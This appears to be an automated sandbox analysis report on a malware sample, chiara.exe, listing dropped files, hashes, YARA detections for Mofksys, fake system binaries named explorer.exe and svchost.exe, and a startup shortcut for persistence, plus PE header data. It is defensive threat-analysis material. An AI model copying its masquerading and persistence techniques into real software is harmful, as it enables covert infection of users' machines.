SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ug3ooglk.hom.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wficig0b.lrt.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrva2zrj.nht.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\~DF0116B3D2B0E63248.TMP

Download File

Process:	C:\Users\user\Desktop\chiara.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	1.013941917518715
Encrypted:	false
SSDEEP:	6:rl91bxbtg/Ul+CFQX6cnilt9Xblt59Xh9XR5+1lf35X:rl3b/VFQ3ilfbltD7Ovf5
MD5:	D0F36CAD687ABBDB61FF5A8140F55373
SHA1:	B80051C5A45B164572FBFA4DFBD5B70F873ECAED
SHA-256:	FEB6CEE71365478690A76A45180F62C9C947483D62E710337F287C4021A32EC5
SHA-512:	AC307FA1249F83184C41BE89DC82F0ECEC42D6E4574C7314142E9DBE56647B7D0588ADF14334EA280BBB68BC681DCA00767F8A3522AE3B518B13C63D58217C55
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF0805B41599FCFF7C.TMP

Download File

Process:	C:\Windows\Resources\Themes\explorer.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.4022769148265937
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//Fl/Fllfl/t+lFldRJ:rl912N0xs+CFQXCB9Xh9Xh9XUlf35X
MD5:	1E6AF6327736E3508F1C50506326C220
SHA1:	6115ED14E9AAF178029EA70716D76FECB1469C6C
SHA-256:	A941B5DA057560690B11153765184E0F92983148611048F3FDADA662054E0EFD
SHA-512:	88E4EF129E3CE63511AECC3FE2372C8B09B2A2A54AAE36A9E9C204B4A1CE513AEFC69BDF40C13542A7F3BF1B031C8683E6A191D3136F2FF7DE8D8CA2602B897B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3A411093DBA2871E.TMP

Download File

Process:	C:\Windows\Resources\spoolsv.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	1.0150719828554693
Encrypted:	false
SSDEEP:	6:rl91bxbtg/Ul+CFQXk/lt9Xblt59Xh9XR5+1lf35X:rl3b/VFQk/lfbltD7Ovf5
MD5:	5B08DD175B3D8604C2F86297D9E28F21
SHA1:	DA913639A912B7B71B1A1549E6E1D8F85BCA2434
SHA-256:	C3EA49AC444650D9E012EF95EA7574B95549172DF3B3013D70742E344C86AB9E
SHA-512:	530E14F6B36374E9F469D79C0061DF37220D133889C04E9293D88FEF0BABDDA135B3F1BBC699480E92405552062E54D9B2186DA12B2EEADA5463CCDF1A42DD92
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF6922D861E93146EB.TMP

Download File

Process:	C:\Windows\Resources\Themes\explorer.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	1.0147168692191055
Encrypted:	false
SSDEEP:	6:rl91bxbtg/Ul+CFQXAsilt9Xblt59Xh9XR5+1lf35X:rl3b/VFQAsilfbltD7Ovf5
MD5:	F68040C3380CB3891391453016D386EA
SHA1:	2F2E99097CB508D628AD5D168A6DED5E1FCDF9F2
SHA-256:	FAD50EC2CEB339E057D6BFA373E1B5896D1F291996DD9983CF93C714E6120052
SHA-512:	A1C9B6276EB92F3F3C532CF8C26E682CBEF3178395141F12E78D1D196F2EAD2347BC579B18EDEE287F7DBF25CE666E0F03459431B081F4538ACC3048A99A3843
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFAB30193D5FE0DA48.TMP

Download File

Process:	C:\Windows\Resources\spoolsv.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	1.0150719828554693
Encrypted:	false
SSDEEP:	6:rl91bxbtg/Ul+CFQXQHl/lt9Xblt59Xh9XR5+1lf35X:rl3b/VFQQHl/lfbltD7Ovf5
MD5:	05279CDCAB30C044192A07A9B25530DA
SHA1:	623810BD6C4A6A7B240B65775179DFA7814C86A7
SHA-256:	44E786620ABAE90A2CA37B9BE5F4D47C6985E14706F6E786C787901FA4C9E9AF
SHA-512:	E840F78DEF31F21DB04910C30EDFA2129B8FADBAD6F534A11D412CE1C4E24CE1FB491E1FF286735ADB2BB59E8D9EC2282DAD490E772114E340D717DDF06D80BA
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFB3C0942E5B87526E.TMP

Download File

Process:	C:\Windows\Resources\svchost.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	1.0142277201597727
Encrypted:	false
SSDEEP:	6:rl91bxbtg/Ul+CFQXutVlt9Xblt59Xh9XR5+1lf35X:rl3b/VFQUlfbltD7Ovf5
MD5:	045C3816620EE100F9CD1F992DD1A74B
SHA1:	12DDDA5D5DD9C4FD8726560CC34F610F0A03C650
SHA-256:	4F345FEB34EC03A18F334A72A1FB4A43EFCD87C80162080F625F784A66D9ABC6
SHA-512:	BF56C4B3DF99B9448A8958669DF5EC2B30C4FA6E7F57DB8AF81922420E80698307CB3E747CFAC7076E914F66104A1F71D39C4948B1A49E98DDCB02DE484EE655
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC6A082B4A07E15BB.TMP

Download File

Process:	C:\Windows\Resources\Themes\icsys.icn.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	1.0150719828554693
Encrypted:	false
SSDEEP:	6:rl91bxbtg/Ul+CFQXx/lt9Xblt59Xh9XR5+1lf35X:rl3b/VFQx/lfbltD7Ovf5
MD5:	C0AA088E39FCA7ED3D694CC788C5E124
SHA1:	87A5AFB97E6F921F7B7DDEDC6000ADBDA8B3DB1D
SHA-256:	420B1AC2208412889E24ECDBBFD5EB1D2FE0E182DD74AD813F4561DA21F64A72
SHA-512:	3901B60FB5F720D72D60817D79956B7F22C751FFACEE6A20D5FF2F9EBAB76F950DFB13946556B240B691839D621220E4E1A2BEFA6A1F4B4563A555CFF487D5DB
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFF897AAFEDAB98FAB.TMP

Download File

Process:	C:\Windows\Resources\svchost.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.4022769148265937
Encrypted:	false
SSDEEP:	3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//Fl/Fllfl/t+lFldRJ:rl912N0xs+CFQXCB9Xh9Xh9XUlf35X
MD5:	1E6AF6327736E3508F1C50506326C220
SHA1:	6115ED14E9AAF178029EA70716D76FECB1469C6C
SHA-256:	A941B5DA057560690B11153765184E0F92983148611048F3FDADA662054E0EFD
SHA-512:	88E4EF129E3CE63511AECC3FE2372C8B09B2A2A54AAE36A9E9C204B4A1CE513AEFC69BDF40C13542A7F3BF1B031C8683E6A191D3136F2FF7DE8D8CA2602B897B
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Logon Application.lnk

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Sep 2 11:25:19 2024, mtime=Mon Sep 2 11:25:19 2024, atime=Mon Sep 2 11:25:19 2024, length=42064, window=hide
Category:	dropped
Size (bytes):	857
Entropy (8bit):	5.04937656321885
Encrypted:	false
SSDEEP:	12:8ZrpCo4fd88CYnlsY//7vsDxuTBSLGA+uMsI4lXjAykHZcW+MsI4l+jctcfmV:8Z0fO8fZDQYdsR+uVBAyE+VAjctcfm
MD5:	7948607F32CDD52199AE92A7861DA164
SHA1:	409D1378B36539DFE4599034A9A8BFDFAD0674CF
SHA-256:	7AC923760CE1C6D30EB0988DBD0DF50B1F4053F7974C7302FE5AFC1E3B9B68DD
SHA-512:	6EDA6E07B2693834A2C8BB1BCDB13C4989EEBE6AC7B89A8842BFAD4F6C144B660D22161209C1222E483FBEFE5F18143C34C0A827FB8C67DD408D60B9CF6E275B
Malicious:	false
Preview:	L..................F.... .....i,3....%.,3.....i,3...P.........................:..DG..Yr?.D..U..k0.&...&...... M.....`...2....N.,3.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl"Y.b....B.....................Bdg.A.p.p.D.a.t.a...B.V.1....."Y.b..Roaming.@......DWSl"Y.b....C.....................{...R.o.a.m.i.n.g.......2.P..."Yc .WINDOW~1.EXE..l......"Yc"Y*c....[.........................W.i.n.d.o.w.s. .L.o.g.o.n. .A.p.p.l.i.c.a.t.i.o.n...e.x.e.......l...............-.......k...........[.......C:\Users\user\AppData\Roaming\Windows Logon Application.exe..,.....\.....\.....\.....\.....\.W.i.n.d.o.w.s. .L.o.g.o.n. .A.p.p.l.i.c.a.t.i.o.n...e.x.e.`.......X.......405464...........hT..CrF.f4... ...Lh&i...,...W..hT..CrF.f4... ...Lh&i...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\Windows Logon Application.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	42064
Entropy (8bit):	6.19564898727408
Encrypted:	false
SSDEEP:	384:qtpFVLK0MsihB9VKS7xdgl6KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+RPZTg:GBMs2SqdSZ6Iq8BxTfqWR8h7ukP
MD5:	5D4073B2EB6D217C19F2B22F21BF8D57
SHA1:	F0209900FBF08D004B886A0B3BA33EA2B0BF9DA8
SHA-256:	AC1A3F21FCC88F9CEE7BF51581EAFBA24CC76C924F0821DEB2AFDF1080DDF3D3
SHA-512:	9AC94880684933BA3407CDC135ABC3047543436567AF14CD9269C4ADC5A6535DB7B867D6DE0D6238A21B94E69F9890DBB5739155871A624520623A7E56872159
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Bank Details.exe, Detection: malicious, Browse Filename: Signed Document..exe, Detection: malicious, Browse Filename: PO CONTRACT.exe, Detection: malicious, Browse Filename: image.exe, Detection: malicious, Browse Filename: ABA NEW ORDER No.2400228341.pdf.exe, Detection: malicious, Browse Filename: 09099627362726.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.TrojanX-gen.10530.8108.exe, Detection: malicious, Browse Filename: 719#U665a) HBL# LMSIN2407028 (by SEA) PO# 4500577338, by 1x40' HQ.pdf.scr.exe, Detection: malicious, Browse Filename: ISF - SO.4985 KEL-RIO GRANPE HBL#KELRIG2406221.scr.exe, Detection: malicious, Browse Filename: F46VBJ6Yvy.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,>.]..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..PB...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..\|J..........lm.......o......................................2~.....o.....r...p(....VrK..p(....s...........0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........................."..(.....{Q...-...}Q.....(+...(....(,....(+..."..(-.....(......(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s

C:\Users\user\Desktop\chiara.exe

Download File

Process:	C:\Users\user\Desktop\chiara.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1267961
Entropy (8bit):	7.728773186826988
Encrypted:	false
SSDEEP:	24576:suDXTIGaPhEYzUzA0dCxs1TxICxVhfF/3Byqr7ghyCanq+hO5rrH:7Djlabwz98ixHxVFdxyogwq+Y5X
MD5:	BDEBF3879721FD16DBC911F31C675AB9
SHA1:	CB080FC9A4EC03B20E70E7BA59378795D8342835
SHA-256:	19A5F13F9F0BC9C095E789CE12BE35E3DF662CD5794AC785E422990260155BF1
SHA-512:	B46EB6F14295DCD32021432240C79468DF96E28B4B1CF1D63E2837698552A90DD5403199A1FC6E30D0184F3724B233454E2A7815DF8F85DC5A1DB25A75658F8A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h.....................@....................................#.....`.............................................4......P....... u......l0..............p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc... u.......v..................@..@.reloc..p............^..............@..B........................................................................................................................................

C:\Windows\Resources\Themes\explorer.exe

Download File

Process:	C:\Windows\Resources\Themes\icsys.icn.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
Category:	dropped
Size (bytes):	138358
Entropy (8bit):	5.8346127949863105
Encrypted:	false
SSDEEP:	1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVp7:UVqoCl/YgjxEufVU0TbTyDDalX7
MD5:	BB11F2754E3A66599975C5F2EEBC8B6D
SHA1:	B4AB874C675972E8CDA774E51F609CE79DF97ED2
SHA-256:	FAE43845434758ADCBB4BED45881FC44A8B84151A1B6B836DDDA063CD232AF23
SHA-512:	120F90F91BB85954F0E0817B72EAA8BCE24818EE87DD0B85BDB48B3EAA5357CA8DBAEA3D29B56C619E8DABE4BBE27A5B9E7D939E9A854E90879B8192B84373E7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\explorer.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@..................................E..........................................(...........................................................................(... ....... ............................text.............................. ....data...............................@....rsrc............ ................5.@...l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Resources\Themes\icsys.icn.exe

Download File

Process:	C:\Users\user\Desktop\chiara.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
Category:	dropped
Size (bytes):	138373
Entropy (8bit):	5.827181474078615
Encrypted:	false
SSDEEP:	1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVpM:UVqoCl/YgjxEufVU0TbTyDDalXM
MD5:	4D76C5FFDB96E3DFCAFB57DA763E9D31
SHA1:	2DEF1C2F558B11590986DC3885A253CB851A7AAD
SHA-256:	435123127E5E3B83E9A6D8B607D564E3DF72269724534A7792F27B4B7D925369
SHA-512:	939F98C759A5C8D424D76CC87A840EFCFC3C253BD289E5C0EB8C823FD1D4AA48AC4B91F156E7660673A2CCBACE781B9C1ED930AA365264F7BEB6A757C44A52E8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\icsys.icn.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@..................................E..........................................(...........................................................................(... ....... ............................text.............................. ....data...............................@....rsrc............ ................5.@...l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Resources\spoolsv.exe

Download File

Process:	C:\Windows\Resources\Themes\explorer.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
Category:	dropped
Size (bytes):	138413
Entropy (8bit):	5.828516270169889
Encrypted:	false
SSDEEP:	1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVpQ:UVqoCl/YgjxEufVU0TbTyDDalXQ
MD5:	1E8FD9AB3425B7B8E99567C3A820C372
SHA1:	E8ADC585333FD06EA98F161C3C759C7B6CB9511E
SHA-256:	679D6867FDA69ED15C7F5E1888C6CF008E18A13F735B9A1D61661D26E63E262E
SHA-512:	BCE3434D4BD6C5D4F482003912B5995D2B5A4FBAEFFAC9D432563CAD56BD7007DE2BEF5BEDC94285DA0D837C58AA850E6E1253E47AE7D9EC0BD23DEE7A7D0942
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\spoolsv.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@..................................E..........................................(...........................................................................(... ....... ............................text.............................. ....data...............................@....rsrc............ ................5.@...l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Resources\svchost.exe

Download File

Process:	C:\Windows\Resources\spoolsv.exe
File Type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
Category:	dropped
Size (bytes):	138342
Entropy (8bit):	5.827068492533011
Encrypted:	false
SSDEEP:	1536:UfsEqouTRcG/Mzvgf7xEuvnXNTRdUzwTekUOisZ1yDDajtXbVpw:UVqoCl/YgjxEufVU0TbTyDDalXw
MD5:	A92C1525A326CEB946667E8533099E63
SHA1:	FB645D376FDD73918FC5C25501CEE62CFC1AA342
SHA-256:	5BCEBBD385DF842CFC0DD3D5362F4B3C2175F44649B83379FD8852E21839B409
SHA-512:	712717EEC57895FAF2E9412D2F9F3604769CF4AB4CC5FD5C8CAB08357068EC26A8073BEBA03EB151AD761B434199C5BD3C57C424E515D5F711CA7C5AA9CC1404
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\svchost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@..................................E..........................................(...........................................................................(... ....... ............................text.............................. ....data...............................@....rsrc............ ................5.@...l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\Windows Logon Application.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2017
Entropy (8bit):	4.659840607039457
Encrypted:	false
SSDEEP:	48:zK4QsD4ql0+1AcJRy0EJP64gFljVlWo3ggxUnQK2qmBvgw1+5:zKgDEcTytNe3Wo3uQVBIe+5
MD5:	3BF802DEB390033F9A89736CBA5BFAFF
SHA1:	25A7177A92E0283B99C85538C4754A12AC8AD197
SHA-256:	5202EB464D6118AC60F72E89FBAAACF1FB8CF6A232F98F47F88D0E7B2F3AFDB3
SHA-512:	EB4F440D28ECD5834FD347F43D4828CA9FEE900FF003764DD1D18B95E0B84E414EAECF70D75236A1463366A189BC5CBA21613F79B5707BF7BDB3CEA312CCE4F7
Malicious:	false
Preview:	Microsoft (R) .NET Framework Installation utility Version 4.8.4084.0..Copyright (C) Microsoft Corporation. All rights reserved.....Usage: InstallUtil [/u \| /uninstall] [option [...]] assembly [[option [...]] assembly] [...]]....InstallUtil executes the installers in each given assembly...If the /u or /uninstall switch is specified, it uninstalls..the assemblies, otherwise it installs them. Unlike other..options, /u applies to all assemblies, regardless of where it..appears on the command line.....Installation is done in a transactioned way: If one of the..assemblies fails to install, the installations of all other..assemblies are rolled back. Uninstall is not transactioned.....Options take the form /switch=[value]. Any option that occurs..before the name of an assembly will apply to that assembly's..installation. Options are cumulative but overridable - options..specified for one assembly will apply to the next as well unless..the option is specified with a new value. The default for

Static File Info

General

File type:	MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
Entropy (8bit):	7.613073174095523
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	chiara.exe
File size:	1'406'359 bytes
MD5:	1c8c35c728f0ac7906153a4da2244a74
SHA1:	ddc216572b1dc8d61f16639e74aceb7b5bf18bab
SHA256:	1707efe35749f4477db431f041481a46dd48d22431e6846f4e13bff760dc4033
SHA512:	5a695481a021ffe4759a16a3396c3feae07077799cb0e54414fba34fea243a2239139aca0268db323c79cac733d2945ae8935ea21c49a635d6d3500e97b1110e
SSDEEP:	24576:PFOa3uDXTIGaPhEYzUzA0dCxs1TxICxVhfF/3Byqr7ghyCanq+hO5rrt:t6Djlabwz98ixHxVFdxyogwq+Y59
TLSH:	FB55F10AFBA404F8E0B7D5B49C628A16F7757C0907B09E4F23A5161A2E77352BD7A313
File Content Preview:	MZ......................................................................!..L.!This program cannot be run in DOS mode....$........t..............z.......................Rich............PE..L...f2YQ.....................0.......)............@................

File Icon


Icon Hash:	202b6167232b0200

Static PE Info

General

Entrypoint:	0x40290c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x51593266 [Mon Apr 1 07:08:22 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	8c16c795b57934183422be5f6df7d891

Entrypoint Preview

Instruction
push 00403ADCh
call 00007FAA60F17293h
add byte ptr [eax], al
dec eax
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax+00h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push edi
or byte ptr [edx-3Bh], bh
xchg byte ptr [edx], bl
hlt
inc edi
test al, FBh
xchg eax, esp
std
jp 00007FAA60F1729Fh
xchg eax, ebx
hlt
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
iretw
adc dword ptr [edi+7250000Ch], esi
outsd
push 00000065h
arpl word ptr [ecx+esi+00h], si
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], dl
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [edi-5Fh], bh
insb
in eax, dx
int3
mov ah, F9h
dec ebx
mov ah, 26h
or ebx, esi
add ebx, ecx
jle 00007FAA60F17223h
add dword ptr [eax], eax
add byte ptr [eax], al
mov al, byte ptr [B0000000h]
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [esp+esi*2+00h], ch
add byte ptr [ecx], al
and byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], ah
and byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ebp+45h], dh
js 00007FAA60F172F9h
popad
je 00007FAA60F17305h
push 00280000h
add byte ptr [eax], al
and byte ptr [eax], al
inc esp
into
jne 00007FAA60F1727Dh
not byte ptr [ebx+13B942C8h]
push esp
push ds
lea ebp, dword ptr [edx-78h]
insb
pop ds
mov bl, DAh
mov ebx, 4A9AD4DAh
test dword ptr [ebx], esi
sbb al, 68h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x198f4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1d000	0x13f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
